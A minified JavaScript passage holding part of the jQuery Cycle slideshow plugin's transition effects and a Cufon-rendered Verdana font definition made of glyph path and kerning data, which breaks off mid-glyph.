h=$cont.height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,true,true);if(d=="right"){opts.animOut.left=w;}else{if(d=="up"){opts.animOut.top=-h;}else{if(d=="down"){opts.animOut.top=h;}else{opts.animOut.left=-w;}}}});opts.animIn={left:0,top:0};opts.animOut={opacity:1};opts.cssBefore={top:0,left:0};};$.fn.cycle.transitions.toss=function($cont,$slides,opts){var w=$cont.css("overflow","visible").width();var h=$cont.height();opts.before.push(function(curr,next,opts){$.fn.cycle.commonReset(curr,next,opts,true,true,true);if(!opts.animOut.left&&!opts.animOut.top){opts.animOut={left:w*2,top:-h/2,opacity:0};}else{opts.animOut.opacity=0;}});opts.cssBefore={left:0,top:0};opts.animIn={left:0};};$.fn.cycle.transitions.wipe=function($cont,$slides,opts){var w=$cont.css("overflow","hidden").width();var h=$cont.height();opts.cssBefore=opts.cssBefore||{};var clip;if(opts.clip){if(/l2r/.test(opts.clip)){clip="rect(0px 0px "+h+"px 0px)";}else{if(/r2l/.test(opts.clip)){clip="rect(0px "+w+"px "+h+"px "+w+"px)";}else{if(/t2b/.test(opts.clip)){clip="rect(0px "+w+"px 0px 0px)";}else{if(/b2t/.test(opts.clip)){clip="rect("+h+"px "+w+"px "+h+"px 0px)";}else{if(/zoom/.test(opts.clip)){var top=parseInt(h/2);var left=parseInt(w/2);clip="rect("+top+"px "+left+"px "+top+"px "+left+"px)";}}}}}}opts.cssBefore.clip=opts.cssBefore.clip||clip||"rect(0px 0px 0px 0px)";var d=opts.cssBefore.clip.match(/(\d+)/g);var t=parseInt(d[0]),r=parseInt(d[1]),b=parseInt(d[2]),l=parseInt(d[3]);opts.before.push(function(curr,next,opts){if(curr==next){return;}var $curr=$(curr),$next=$(next);$.fn.cycle.commonReset(curr,next,opts,true,true,false);opts.cssAfter.display="block";var step=1,count=parseInt((opts.speedIn/13))-1;(function f(){var tt=t?t-parseInt(step*(t/count)):0;var ll=l?l-parseInt(step*(l/count)):0;var bb=b<h?b+parseInt(step*((h-b)/count||1)):h;var rr=r<w?r+parseInt(step*((w-r)/count||1)):w;$next.css({clip:"rect("+tt+"px "+rr+"px "+bb+"px "+ll+"px)"});(step++<=count)?setTimeout(f,13):$curr.css("display","none");})();});opts.cssBefore={display:"block",opacity:1,top:0,left:0};opts.animIn={left:0};opts.animOut={left:0};};})(jQuery);;
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * © 2006 Microsoft Corporation. All Rights Reserved.
 * 
 * Trademark:
 * Verdana is either a registered trademark or a trademark of Microsoft
 * Corporation in the United States and/or other countries.
 * 
 * Manufacturer:
 * Carter & Cone
 * 
 * Designer:
 * Matthew Carter
 * 
 * License information:
 * http://www.microsoft.com/typography/fonts/
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"99,-235r-100,0r0,-27r100,0r0,27xm66,0r-33,0r0,-196r33,0r0,196","w":98},{"d":"51,-240v20,-2,45,-2,47,-22r24,0r0,141r39,0r0,22r-108,0r0,-22r41,0r0,-100r-43,0r0,-19","w":195},{"d":"127,0r-103,0r0,-27r34,0r0,-208r-34,0r0,-27r103,0r0,27r-34,0r0,208r34,0r0,27xm76,-308v22,0,24,-17,25,-44r28,0v9,58,-61,87,-93,48v-9,-12,-14,-28,-14,-48r28,0v0,27,4,44,26,44","w":151},{"d":"180,-360r-40,66r-40,0r-40,-66r28,0r32,45r33,-45r27,0xm208,0r-173,0r0,-262r173,0r0,31r-138,0r0,72r138,0r0,31r-138,0r0,97r138,0r0,31"},{"d":"132,-316v25,0,34,-18,37,-44r29,0v4,59,-75,89,-113,48v-12,-13,-18,-28,-19,-48r29,0v2,27,11,44,37,44xm132,-24v48,0,65,-27,65,-78r0,-160r35,0r0,157v1,71,-30,110,-100,110v-71,0,-100,-39,-101,-110r0,-157r35,0r0,159v-1,51,18,79,66,79","w":263},{"d":"220,-262r-92,147r0,115r-34,0r0,-111r-93,-151r39,0r71,117r72,-117r37,0","w":221,"k":{"\u2014":25,"\u2013":25,"\u0153":23,"\u0152":4,"\u2026":51,"\u00f8":23,"\u00e6":25,"\u00d8":4,"\u00c6":14,"v":18,"u":19,"s":19,"r":18,"q":23,"p":18,"o":23,"n":18,"m":18,"g":23,"e":23,"d":21,"a":25,"O":4,"A":14,";":35,":":35,".":51,"-":25,",":51}},{"d":"67,-55v-1,33,40,34,67,24r0,29v-52,16,-107,0,-101,-62r0,-30r-22,0r0,-23r22,0r0,-52r-22,0r0,-27r22,0r0,-57r33,0r0,57r68,0r0,27r-68,0r0,52r53,0r0,23r-53,0","w":141},{"d":"222,-360r-45,66r-25,0r30,-66r40,0xm151,-360r-45,66r-25,0r30,-66r40,0xm132,-24v48,0,65,-27,65,-78r0,-160r35,0r0,157v1,71,-30,110,-100,110v-71,0,-100,-39,-101,-110r0,-157r35,0r0,159v-1,51,18,79,66,79","w":263},{"d":"37,-262v126,-8,225,15,221,131v-3,88,-56,134,-155,131r-66,0r0,-130r-35,0r0,-25r35,0r0,-107xm71,-30v89,5,151,-15,151,-101v0,-85,-62,-106,-151,-101r0,77r64,0r0,25r-64,0r0,100","w":279},{"d":"197,-300r-130,0r0,-27r130,0r0,27xm132,-24v48,0,65,-27,65,-78r0,-160r35,0r0,157v1,71,-30,110,-100,110v-71,0,-100,-39,-101,-110r0,-157r35,0r0,159v-1,51,18,79,66,79","w":263},{"d":"109,-202v58,0,91,44,91,104v0,59,-32,103,-91,103v-59,0,-90,-43,-90,-103v0,-60,32,-104,90,-104xm109,-23v40,0,57,-31,57,-75v0,-45,-16,-75,-57,-75v-40,0,-56,30,-56,75v0,44,16,75,56,75xm163,-229r-35,0r0,-34r35,0r0,34xm91,-229r-35,0r0,-34r35,0r0,34","w":218},{"d":"128,-215v-4,-43,-68,-22,-91,-10r0,-31v42,-18,126,-18,123,39v-3,51,-53,68,-86,92r96,0r0,26r-134,0r0,-28v31,-17,68,-43,86,-65v4,-6,6,-13,6,-23","w":195},{"d":"8,-34v41,15,88,12,88,-47r0,-153r-55,0r0,-28r90,0r0,194v2,65,-61,81,-123,67r0,-33","w":163,"k":{"\u2026":4,"\u00c6":2,"A":2,".":4,",":4}},{"d":"66,-49v19,25,80,28,99,-1r0,-146r33,0r0,196r-32,0r-1,-21v-20,31,-78,32,-99,1r0,92r-33,0r0,-268r33,0r0,147","w":230},{"d":"97,-173v-31,0,-56,25,-35,46v35,22,113,10,111,70v-1,29,-18,47,-42,55v11,60,-35,88,-91,72v1,-9,-2,-21,1,-28v27,12,75,9,64,-38v-33,4,-66,-5,-86,-16v2,-11,-3,-29,2,-37v17,13,44,24,72,26v35,3,58,-23,39,-47v-35,-21,-112,-12,-112,-71v0,-67,98,-71,145,-45v-2,11,3,28,-2,35v-14,-12,-41,-22,-66,-22","w":187},{"d":"200,-294r-28,0r-33,-45r-32,45r-27,0r40,-66r40,0xm142,-267v82,0,121,52,121,136v0,84,-40,136,-121,136v-82,0,-122,-53,-122,-136v0,-82,40,-136,122,-136xm142,-25v57,0,85,-44,85,-106v0,-62,-28,-106,-85,-106v-58,0,-86,43,-86,106v0,62,28,106,86,106","w":283},{"d":"175,0r-159,0r0,-24r115,-145r-112,0r0,-27r153,0r0,23r-115,145r118,0r0,28xm142,-295r-48,66r-26,0r32,-66r42,0","w":189},{"d":"139,42v35,7,69,2,63,-40r-134,-236r0,234r-33,0r0,-262r54,0r113,197r0,-197r33,0r0,266v2,54,-40,79,-96,68r0,-30","w":269},{"d":"66,-167v24,-22,48,-34,89,-27v-2,10,3,27,-2,34v-33,-11,-68,2,-87,21r0,139r-33,0r0,-196r33,0r0,29xm134,-295r-48,66r-26,0r32,-66r42,0","w":153},{"d":"30,-240v24,0,39,-1,42,-22r24,0r0,163r-29,0r0,-120r-37,0r0,-21xm248,-262r-137,262r-29,0r137,-262r29,0xm326,-39r-28,0r0,39r-27,0r0,-39r-81,0r0,-32r82,-95r26,0r0,104r28,0r0,23xm272,-62r0,-70r-62,70r62,0","w":360},{"d":"147,-295r-37,0r0,-34r37,0r0,34xm208,0r-173,0r0,-262r173,0r0,31r-138,0r0,72r138,0r0,31r-138,0r0,97r138,0r0,31"},{"d":"66,0r-33,0r0,-196r33,0r0,196","w":98},{"d":"66,0r-33,0r0,-196r33,0r0,196xm102,-295r-48,66r-26,0r32,-66r42,0","w":98},{"d":"49,-248v20,0,24,-15,24,-40r25,0v8,53,-55,81,-85,44v-8,-11,-13,-26,-13,-44r26,0v0,23,4,40,23,40xm66,0r-33,0r0,-196r33,0r0,196","w":98},{"d":"151,-316v25,0,34,-18,37,-44r29,0v4,59,-75,89,-113,48v-12,-13,-18,-28,-19,-48r29,0v2,27,11,44,37,44xm56,-132v0,91,85,129,163,95r0,-64r-70,0r0,-31r104,0r0,113v-25,12,-60,24,-95,24v-89,-1,-138,-47,-138,-136v0,-84,53,-136,138,-135v38,0,65,9,95,23r0,41v-29,-15,-55,-35,-101,-35v-60,0,-96,44,-96,105","w":279},{"d":"131,-202v90,-3,62,118,66,202r-33,0r0,-112v-1,-34,-5,-60,-42,-58v-22,1,-42,11,-56,23r0,147r-33,0r0,-196r33,0r0,21v18,-14,37,-26,65,-27xm169,-295r-48,66r-26,0r32,-66r42,0"},{"d":"97,-173v-31,0,-56,25,-35,46v35,22,111,10,111,70v0,69,-107,74,-154,45v2,-11,-3,-29,2,-37v17,13,44,24,72,26v35,3,58,-23,39,-47v-35,-21,-112,-12,-112,-71v0,-67,98,-71,145,-45v-2,11,3,28,-2,35v-14,-12,-41,-22,-66,-22xm150,-295r-48,66r-26,0r32,-66r42,0","w":187},{"d":"191,-294r-28,0r-33,-45r-32,45r-28,0r41,-66r39,0xm132,-24v48,0,65,-27,65,-78r0,-160r35,0r0,157v1,71,-30,110,-100,110v-71,0,-100,-39,-101,-110r0,-157r35,0r0,159v-1,51,18,79,66,79","w":263},{"d":"68,-229r-37,0r0,-34r37,0r0,34xm66,0r-33,0r0,-196r33,0r0,196xm191,-229r-38,0r0,-34r38,0r0,34xm117,45v33,1,39,-23,39,-55r0,-159r-41,0r0,-27r74,0r0,201v4,59,-50,80,-103,64v2,-9,-3,-25,2,-31v6,2,21,7,29,7","w":220},{"d":"109,-202v58,0,91,44,91,104v0,59,-32,103,-91,103v-59,0,-90,-43,-90,-103v0,-60,32,-104,90,-104xm109,-23v40,0,57,-31,57,-75v0,-45,-16,-75,-57,-75v-40,0,-56,30,-56,75v0,44,16,75,56,75","w":218,"k":{"\u2026":4,"y":3,"x":4,"v":3,".":4,",":5}},{"d":"194,-295r-45,66r-25,0r30,-66r40,0xm123,-295r-45,66r-25,0r30,-66r40,0xm109,-202v58,0,91,44,91,104v0,59,-32,103,-91,103v-59,0,-90,-43,-90,-103v0,-60,32,-104,90,-104xm109,-23v40,0,57,-31,57,-75v0,-45,-16,-75,-57,-75v-40,0,-56,30,-56,75v0,44,16,75,56,75","w":218},{"d":"212,-207v-30,-30,-151,-51,-151,12v0,82,166,11,164,120v-1,92,-134,93,-201,59v2,-14,-4,-34,2,-44v33,36,155,60,163,-10v-9,-80,-164,-12,-164,-122v0,-82,129,-87,190,-56r0,41r-3,0xm173,-361r-48,66r-26,0r32,-66r42,0","w":246},{"d":"163,-295r-38,0r0,-34r38,0r0,34xm147,-25v40,1,64,-18,90,-35r0,41v-26,11,-51,24,-89,24v-85,0,-128,-50,-128,-136v0,-85,44,-135,129,-135v36,0,59,8,88,23v-2,13,4,32,-2,41v-25,-20,-49,-36,-89,-35v-61,2,-90,42,-90,106v0,64,31,104,91,106","w":251},{"d":"195,-294r-28,0r-32,-45r-33,45r-27,0r40,-66r40,0xm235,0r-34,0r0,-128r-131,0r0,128r-35,0r0,-262r35,0r0,103r131,0r0,-103r34,0r0,262","w":270},{"d":"98,-267v48,1,77,35,77,87v0,53,-29,86,-77,87v-48,0,-77,-37,-77,-87v0,-50,28,-88,77,-87xm98,-120v32,0,45,-24,45,-60v0,-36,-13,-61,-45,-61v-31,0,-45,25,-45,61v0,36,13,60,45,60","w":196},{"d":"202,-196r-114,268r-36,0r37,-81r-78,-187r36,0r60,145r61,-145r34,0xm163,-295r-48,66r-26,0r32,-66r42,0","w":213},{"d":"201,0r-166,0r0,-262r35,0r0,231r131,0r0,31xm113,-361r-48,66r-26,0r32,-66r42,0","w":200},{"d":"37,-262v126,-8,225,15,221,131v-3,88,-56,134,-155,131r-66,0r0,-130r-35,0r0,-25r35,0r0,-107xm71,-30v89,5,151,-15,151,-101v0,-85,-62,-106,-151,-101r0,77r64,0r0,25r-64,0r0,100","w":279},{"d":"113,-24v28,0,46,-16,65,-25r0,37v-69,37,-160,7,-160,-86v0,-88,90,-126,160,-87v-2,11,3,29,-2,37v-16,-14,-38,-23,-63,-24v-40,0,-60,30,-60,74v0,44,20,74,60,74xm160,-295r-48,66r-26,0r32,-66r42,0","w":187},{"d":"172,-295r-40,67r-40,0r-40,-67r28,0r32,45r33,-45r27,0xm113,-24v28,0,46,-16,65,-25r0,37v-69,37,-160,7,-160,-86v0,-88,90,-126,160,-87v-2,11,3,29,-2,37v-16,-14,-38,-23,-63,-24v-40,0,-60,30,-60,74v0,44,20,74,60,74","w":187},{"d":"89,-225r-36,0r0,-37r36,0r0,37xm91,0r-40,0r5,-190r30,0","w":141},{"d":"126,-316v25,0,34,-18,37,-44r29,0v4,59,-75,89,-114,48v-12,-13,-17,-28,-18,-48r29,0v2,27,11,44,37,44xm208,0r-173,0r0,-262r173,0r0,31r-138,0r0,72r138,0r0,31r-138,0r0,97r138,0r0,31"},{"d":"147,-25v40,1,64,-18,90,-35r0,41v-26,11,-51,24,-89,24v-85,0,-128,-50,-128,-136v0,-85,44,-135,129,-135v36,0,59,8,88,23v-2,13,4,32,-2,41v-25,-20,-49,-36,-89,-35v-61,2,-90,42,-90,106v0,64,31,104,91,106xm188,-361r-48,66r-26,0r32,-66r42,0","w":251},{"d":"167,-202v90,-3,60,119,65,202r-33,0r0,-112v-1,-34,-5,-60,-42,-58v-22,1,-42,11,-56,23r0,147r-33,0r0,-196r33,0r0,21v18,-15,38,-27,66,-27xm72,-274r-48,99r-24,0r29,-99r43,0","w":262},{"d":"132,-266v79,-1,120,54,120,135v0,79,-40,138,-116,136v-85,-2,-121,-62,-116,-162r194,0v-5,-42,-36,-79,-82,-79v-35,0,-59,11,-84,24r0,-38v26,-11,53,-16,84,-16xm56,-125v1,55,27,100,80,100v53,0,79,-45,80,-100r-160,0","w":271},{"d":"106,-26v22,0,41,-12,56,-24r0,-146r33,0r0,196r-33,0r0,-22v-20,14,-35,26,-65,27v-91,4,-61,-117,-66,-201r33,0v8,63,-27,170,42,170"},{"d":"209,-262r-78,148r0,9r65,0r0,24r-65,0r0,24r65,0r0,24r-65,0r0,33r-33,0r0,-33r-65,0r0,-24r65,0r0,-24r-65,0r0,-24r65,0r0,-9r-79,-148r37,0r59,116r59,-116r35,0","w":228},{"d":"172,-228r-28,0r-32,-45r-32,45r-28,0r40,-67r40,0xm113,-24v28,0,46,-16,65,-25r0,37v-69,37,-160,7,-160,-86v0,-88,90,-126,160,-87v-2,11,3,29,-2,37v-16,-14,-38,-23,-63,-24v-40,0,-60,30,-60,74v0,44,20,74,60,74","w":187},{"d":"226,-236v23,24,38,56,37,105v-1,84,-40,136,-121,136v-27,0,-53,-7,-70,-19r-28,40r-23,0r36,-52v-24,-23,-37,-59,-37,-105v0,-82,40,-134,122,-136v30,0,49,7,69,19r25,-35r23,0xm142,-237v-91,0,-105,121,-66,184r117,-168v-13,-10,-28,-16,-51,-16xm142,-24v89,0,105,-121,65,-184r-117,168v14,10,29,16,52,16","w":283,"k":{"\u2026":5,"Z":4,"Y":4,"X":2,"T":9,".":5,",":5}},{"d":"188,-298r-130,0r0,-28r130,0r0,28xm242,0r-38,0r-25,-73r-113,0r-26,73r-35,0r95,-262r46,0xm168,-103r-46,-128r-46,128r92,0","w":246},{"d":"114,-346v33,0,62,25,62,59v0,33,-28,60,-62,60v-33,0,-61,-28,-61,-60v0,-33,28,-59,61,-59xm114,-250v20,0,36,-17,36,-37v0,-20,-17,-36,-36,-36v-19,0,-36,17,-36,36v0,19,17,37,36,37xm106,-26v22,0,41,-12,56,-24r0,-146r33,0r0,196r-33,0r0,-22v-20,14,-35,26,-65,27v-91,4,-61,-117,-66,-201r33,0v8,63,-27,170,42,170"},{"d":"181,-294r-28,0r-32,-45r-33,45r-27,0r40,-66r40,0xm208,0r-173,0r0,-262r173,0r0,31r-138,0r0,72r138,0r0,31r-138,0r0,97r138,0r0,31"},{"d":"134,-24v27,-1,46,-16,63,-24r0,35v-16,7,-40,14,-63,14r0,62r-20,0r0,-63v-53,-4,-86,-41,-86,-98v0,-56,35,-95,86,-99r0,-62r20,0r0,61v23,0,47,7,63,14v-2,11,3,29,-2,36v-14,-11,-36,-23,-61,-24r0,148xm114,-172v-52,1,-65,84,-39,124v9,12,22,20,39,23r0,-147","w":228},{"d":"59,42v31,12,78,7,65,-42r-89,0r0,-262r35,0r0,231r131,0r0,31r-50,0v11,59,-36,86,-92,70r0,-28","w":200},{"d":"208,0r-173,0r0,-262r173,0r0,31r-138,0r0,72r138,0r0,31r-138,0r0,97r138,0r0,31xm174,-361r-48,66r-26,0r32,-66r42,0"},{"d":"207,-191v0,40,-22,66,-54,77r99,114r-45,0r-88,-104r-49,0r0,104r-35,0r0,-262v82,0,173,-10,172,71xm70,-133v54,2,100,0,100,-55v0,-48,-51,-45,-100,-44r0,99xm167,-361r-48,66r-26,0r32,-66r42,0","w":250},{"d":"68,-229r-37,0r0,-34r37,0r0,34xm66,0r-33,0r0,-196r33,0r0,196","w":98},{"d":"206,-223r-118,223r-38,0r126,-231r-149,0r0,-31r179,0r0,39","w":228},{"d":"52,-95v-6,81,97,83,141,47r0,36v-72,38,-174,10,-174,-85v0,-61,37,-105,95,-105v60,0,87,41,83,107r-145,0xm165,-120v7,-54,-64,-70,-95,-39v-10,10,-17,24,-18,39r113,0xm168,-295r-48,66r-26,0r32,-66r42,0","w":214},{"d":"207,-191v0,40,-22,66,-54,77r99,114r-45,0r-88,-104r-49,0r0,104r-35,0r0,-262v82,0,173,-10,172,71xm70,-133v54,2,100,0,100,-55v0,-48,-51,-45,-100,-44r0,99xm60,42v33,14,81,4,64,-46r27,0v14,59,-33,91,-91,74r0,-28","w":250},{"d":"21,-131v0,-91,54,-131,156,-131r188,0r0,31r-134,0r0,72r134,0r0,31r-134,0r0,97r134,0r0,31r-189,0v-99,3,-155,-43,-155,-131xm57,-131v-1,80,54,105,139,101r0,-202v-86,-6,-138,24,-139,101","w":385},{"d":"242,0r-38,0r-25,-73r-113,0r-26,73r-35,0r95,-262r46,0xm168,-103r-46,-128r-46,128r92,0xm152,-295r-26,0r-48,-66r42,0","w":246},{"d":"290,-267v11,35,-1,73,-37,74v30,94,-7,202,-111,198v-82,-3,-122,-53,-122,-136v0,-82,40,-136,122,-136v48,0,82,20,100,52v30,2,29,-32,20,-52r28,0xm142,-25v57,0,85,-44,85,-106v0,-62,-28,-106,-85,-106v-58,0,-86,43,-86,106v0,62,28,106,86,106","w":290},{"d":"176,-360r-40,66r-40,0r-40,-66r27,0r33,45r32,-45r28,0xm207,-191v0,40,-22,66,-54,77r99,114r-45,0r-88,-104r-49,0r0,104r-35,0r0,-262v82,0,173,-10,172,71xm70,-133v54,2,100,0,100,-55v0,-48,-51,-45,-100,-44r0,99","w":250},{"d":"207,-300r-131,0r0,-27r131,0r0,27xm142,-267v82,0,121,52,121,136v0,84,-40,136,-121,136v-82,0,-122,-53,-122,-136v0,-82,40,-136,122,-136xm142,-25v57,0,85,-44,85,-106v0,-62,-28,-106,-85,-106v-58,0,-86,43,-86,106v0,62,28,106,86,106","w":283},{"d":"127,0r-103,0r0,-27r34,0r0,-208r-34,0r0,-27r103,0r0,27r-34,0r0,208r34,0r0,27xm103,-322v12,0,18,-14,17,-28r24,0v-2,31,-13,52,-41,53v-28,1,-33,-25,-55,-28v-13,1,-16,14,-16,29r-24,0v0,-29,15,-52,41,-53v26,-1,32,27,54,27","w":151},{"d":"146,-295r-40,67r-40,0r-40,-67r28,0r32,45r32,-45r28,0xm66,-167v24,-22,48,-34,89,-27v-2,10,3,27,-2,34v-33,-11,-68,2,-87,21r0,139r-33,0r0,-196r33,0r0,29","w":153},{"d":"107,-250v25,0,34,-19,37,-45r29,0v4,59,-74,91,-113,49v-12,-13,-18,-29,-19,-49r29,0v3,26,12,45,37,45xm36,-192v59,-16,149,-18,149,59r0,133r-33,0r0,-21v-18,12,-36,26,-70,26v-36,0,-64,-27,-64,-62v1,-67,68,-69,134,-73v4,-60,-77,-42,-116,-29r0,-33xm52,-59v0,51,80,35,100,11r0,-55v-41,5,-100,-1,-100,44","w":216},{"d":"102,43v42,8,67,-7,62,-52v-8,-62,26,-162,-42,-161v-22,0,-42,11,-56,23r0,147r-33,0r0,-196r33,0r0,21v18,-14,37,-26,65,-27v92,-3,62,122,66,207v3,53,-40,78,-95,67r0,-29"},{"d":"131,-229r-37,0r0,-34r37,0r0,34xm113,-24v28,0,46,-16,65,-25r0,37v-69,37,-160,7,-160,-86v0,-88,90,-126,160,-87v-2,11,3,29,-2,37v-16,-14,-38,-23,-63,-24v-40,0,-60,30,-60,74v0,44,20,74,60,74","w":187},{"d":"36,-192v59,-16,149,-18,149,59r0,133r-33,0r0,-21v-18,12,-36,26,-70,26v-36,0,-64,-27,-64,-62v1,-67,68,-69,134,-73v4,-60,-77,-42,-116,-29r0,-33xm52,-59v0,51,80,35,100,11r0,-55v-41,5,-100,-1,-100,44xm164,-295r-48,66r-26,0r32,-66r42,0","w":216},{"d":"201,0r-166,0r0,-262r35,0r0,231r131,0r0,31xm166,-274r-43,89r-23,0r27,-89r39,0","w":200},{"d":"136,-294r-28,0r-32,-45r-32,45r-28,0r40,-66r40,0xm127,0r-103,0r0,-27r34,0r0,-208r-34,0r0,-27r103,0r0,27r-34,0r0,208r34,0r0,27","w":151},{"d":"36,-192v43,-13,121,-16,138,23v15,-18,38,-33,70,-33v57,1,87,40,82,104r-144,0v-9,84,94,86,140,50r0,36v-45,24,-130,23,-154,-20v-19,19,-45,37,-86,37v-35,0,-64,-26,-64,-61v1,-66,68,-66,134,-68v8,-65,-75,-51,-116,-35r0,-33xm294,-124v3,-49,-58,-65,-91,-37v-11,9,-17,21,-20,37r111,0xm52,-58v0,53,86,31,105,6v-4,-12,-7,-29,-7,-46v-44,2,-98,-3,-98,40","w":343},{"d":"235,0r-43,0r-124,-234r0,234r-33,0r0,-262r54,0r113,214r0,-214r33,0r0,262xm62,42v33,14,81,4,64,-46r27,0v14,59,-33,91,-91,74r0,-28","w":269},{"d":"38,42v30,13,80,5,64,-42r-8,0r0,-231r-94,0r0,-31r222,0r0,31r-94,0r2,247v3,50,-45,67,-92,54r0,-28","w":221},{"d":"143,-295r-37,0r0,-34r37,0r0,34xm226,0r-204,0r0,-32r161,-199r-155,0r0,-31r195,0r0,32r-163,199r166,0r0,31","w":246},{"d":"242,0r-38,0r-25,-73r-113,0r-26,73r-35,0r95,-262r46,0xm168,-103r-46,-128r-46,128r92,0xm168,-361r-48,66r-26,0r32,-66r42,0","w":246},{"d":"144,-239v32,31,55,69,56,127v1,69,-31,116,-92,117v-55,1,-89,-34,-89,-90v0,-76,87,-110,145,-68v-8,-26,-26,-54,-45,-70r-46,29r-12,-17r42,-25v-21,-16,-34,-22,-57,-35r0,-3r52,0r30,21r37,-22r11,17xm108,-22v52,0,62,-48,58,-105v-40,-25,-113,-21,-113,42v0,40,19,63,55,63","w":220},{"d":"203,-360r-40,66r-40,0r-40,-66r28,0r33,45r32,-45r27,0xm147,-25v40,1,64,-18,90,-35r0,41v-26,11,-51,24,-89,24v-85,0,-128,-50,-128,-136v0,-85,44,-135,129,-135v36,0,59,8,88,23v-2,13,4,32,-2,41v-25,-20,-49,-36,-89,-35v-61,2,-90,42,-90,106v0,64,31,104,91,106","w":251},{"d":"243,-38r-19,20r-77,-78r-76,78r-20,-20r77,-77r-77,-76r20,-20r76,78r77,-78r19,20r-77,76","w":294},{"d":"202,0r-165,0r0,-94r-33,27r0,-29r33,-26r0,-140r35,0r0,114r61,-50r0,29r-61,49r0,89r130,0r0,31","w":202},{"d":"224,0v-14,42,25,56,54,41r0,28v-42,13,-84,-4,-84,-49v0,-12,4,-27,6,-33r-21,-60r-113,0r-26,73r-35,0r95,-262r46,0r96,262r-18,0xm168,-103r-46,-128r-46,128r92,0","w":246},{"d":"114,-229r-38,0r0,-34r38,0r0,34xm175,0r-159,0r0,-24r115,-145r-112,0r0,-27r153,0r0,23r-115,145r118,0r0,28","w":189},{"d":"235,0r-43,0r-124,-234r0,234r-33,0r0,-262r54,0r113,214r0,-214r33,0r0,262xm190,-361r-48,66r-26,0r32,-66r42,0","w":269},{"d":"79,-267v57,0,75,69,26,82v15,7,34,16,34,40v0,54,-73,58,-114,40r0,-31v20,14,81,32,84,-9v2,-30,-30,-24,-58,-25r0,-24v27,1,55,0,54,-25v0,-37,-62,-22,-75,-6r-3,0r0,-31v14,-6,33,-11,52,-11xm264,-262r-137,262r-29,0r137,-262r29,0xm336,-39r-28,0r0,39r-27,0r0,-39r-81,0r0,-32r81,-95r27,0r0,104r28,0r0,23xm282,-62r0,-70r-62,70r62,0","w":360},{"d":"142,-267v82,0,121,52,121,136v0,84,-40,136,-121,136v-82,0,-122,-53,-122,-136v0,-82,40,-136,122,-136xm142,-25v57,0,85,-44,85,-106v0,-62,-28,-106,-85,-106v-58,0,-86,43,-86,106v0,62,28,106,86,106xm190,-361r-48,66r-26,0r32,-66r42,0","w":283},{"d":"33,-203v-3,-59,45,-82,103,-69v-1,9,2,23,-1,30v-33,-9,-69,-7,-69,39r0,203r-33,0r0,-203","w":108},{"d":"173,-235r-131,0r0,-27r131,0r0,27xm36,-192v59,-16,149,-18,149,59r0,133r-33,0r0,-21v-18,12,-36,26,-70,26v-36,0,-64,-27,-64,-62v1,-67,68,-69,134,-73v4,-60,-77,-42,-116,-29r0,-33xm52,-59v0,51,80,35,100,11r0,-55v-41,5,-100,-1,-100,44","w":216},{"d":"115,-250v25,0,34,-19,37,-45r29,0v4,58,-75,91,-114,49v-12,-13,-17,-29,-18,-49r29,0v2,27,11,45,37,45xm106,-26v22,0,41,-12,56,-24r0,-146r33,0r0,196r-33,0r0,-22v-20,14,-35,26,-65,27v-91,4,-61,-117,-66,-201r33,0v8,63,-27,170,42,170"},{"d":"99,-156r-31,25r0,131r-33,0r0,-107r-31,25r0,-28r31,-24r0,-140r33,0r0,116r31,-26r0,28","w":102},{"d":"334,0r-166,0r0,-98r-92,0r-37,98r-37,0r105,-262r227,0r0,31r-132,0r0,72r132,0r0,31r-132,0r0,97r132,0r0,31xm168,-127r0,-106r-38,0r-42,106r80,0xm253,-361r-48,66r-26,0r32,-66r42,0","w":354},{"d":"277,-274r-44,89r-22,0r26,-89r40,0xm19,-97v0,-81,72,-130,140,-91r0,-86r33,0r0,274r-33,0r0,-21v-17,14,-35,27,-64,26v-51,-1,-76,-45,-76,-102xm103,-26v22,0,43,-10,56,-22r0,-113v-51,-27,-110,-2,-106,64v2,42,11,70,50,71","w":233},{"d":"110,-250v25,0,33,-18,36,-45r29,0v4,59,-74,91,-113,49v-12,-13,-18,-29,-19,-49r30,0v2,27,11,45,37,45xm109,-202v58,0,91,44,91,104v0,59,-32,103,-91,103v-59,0,-90,-43,-90,-103v0,-60,32,-104,90,-104xm109,-23v40,0,57,-31,57,-75v0,-45,-16,-75,-57,-75v-40,0,-56,30,-56,75v0,44,16,75,56,75","w":218},{"d":"238,-294r-28,0r-32,-45r-33,45r-27,0r40,-66r40,0xm340,-262r-68,262r-39,0r-55,-217r-54,217r-39,0r-69,-262r36,0r55,218r54,-218r35,0r55,220r55,-220r34,0","w":355},{"d":"130,-202v52,1,75,43,75,101v0,81,-71,130,-139,91r0,82r-33,0r0,-268r33,0r0,20v16,-13,38,-26,64,-26xm66,-37v48,27,110,4,105,-63v-3,-42,-11,-69,-49,-70v-22,0,-42,10,-56,22r0,111","w":224,"k":{"\u2026":4,"y":1,".":4,",":5}},{"d":"163,-322v13,0,19,-13,19,-28r23,0v-2,32,-16,53,-45,54v-27,1,-36,-25,-59,-29v-14,1,-19,13,-19,29r-23,0v1,-31,16,-52,44,-53v28,-2,35,26,60,27xm132,-24v48,0,65,-27,65,-78r0,-160r35,0r0,157v1,71,-30,110,-100,110v-71,0,-100,-39,-101,-110r0,-157r35,0r0,159v-1,51,18,79,66,79","w":263},{"d":"183,-267v94,0,143,56,146,150v0,37,-12,66,-28,89r-77,0r-5,-20v-16,12,-28,22,-52,22v-43,0,-65,-37,-65,-85v0,-66,61,-108,117,-76r0,-8r28,0r0,148r43,0v39,-87,-1,-203,-107,-196v-79,5,-124,51,-127,130v-3,103,89,151,189,121r0,25v-118,27,-217,-30,-214,-147v3,-92,60,-153,152,-153xm174,-53v17,0,34,-11,45,-19r0,-91v-41,-23,-87,-1,-87,52v0,35,11,57,42,58","w":360},{"d":"66,0r-33,0r0,-196r33,0r0,196xm71,-229r-26,0r-48,-66r42,0","w":98},{"d":"133,69r-91,0r0,-343r91,0r0,26r-60,0r0,292r60,0r0,25","w":163},{"d":"94,-295r-37,0r0,-34r37,0r0,34xm127,0r-103,0r0,-27r34,0r0,-208r-34,0r0,-27r103,0r0,27r-34,0r0,208r34,0r0,27","w":151},{"d":"151,-274r-126,327r-30,0r125,-327r31,0","w":163},{"d":"117,20r-30,54r-26,0r18,-54r38,0xm97,-173v-31,0,-56,25,-35,46v35,22,111,10,111,70v0,69,-107,74,-154,45v2,-11,-3,-29,2,-37v17,13,44,24,72,26v35,3,58,-23,39,-47v-35,-21,-112,-12,-1